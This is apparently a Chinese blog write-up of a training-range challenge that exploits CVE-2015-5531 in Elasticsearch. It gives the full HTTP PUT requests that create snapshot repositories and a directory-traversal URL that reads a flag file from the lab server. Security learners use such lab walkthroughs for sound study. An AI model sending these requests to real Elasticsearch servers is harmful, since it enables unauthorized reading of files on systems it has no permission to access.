春秋云境CVE-2015-5531

1.阅读靶场介绍这里能直接得到思路就是目录遍历然后用...访问2.启动靶场这里可能要稍等片刻哟靶场才可以正常正常页面如下所示3.poc其实各位彦祖也可以直接利用博主的包去修改host部分的内容即可这里我们直接启动bp抓包然后先构造这个包PUT /_snapshot/test HTTP/1.1 Host: 8.147.132.32:40772 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8,zh-HK;q0.7,en-US;q0.6,en;q0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: wp-settings-time-11762481244 Upgrade-Insecure-Requests: 1 Priority: u0, i Content-Length: 114 { type: fs, settings: { location: /usr/share/elasticsearch/repo/test } }返回的结果是200就是没问题的然后构造这个包PUT /_snapshot/tes2t HTTP/1.1 Host: 8.147.132.32:40772 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 Accept: text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8 Accept-Language: zh-CN,zh;q0.9,zh-TW;q0.8,zh-HK;q0.7,en-US;q0.6,en;q0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Cookie: wp-settings-time-11762481244 Upgrade-Insecure-Requests: 1 Priority: u0, i Content-Length: 132 { type: fs, settings: { location: /usr/share/elasticsearch/repo/test/snapshot-backdata } }结果如上图所示最后就是访问这个urlhttp://8.147.132.32:40772/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fflag会出现这个结果然后就是复制数字的部分喂给ai稍等片刻就可以得到我们心心念念的flag了如下所示到此文章就结束了感谢您宝贵的时间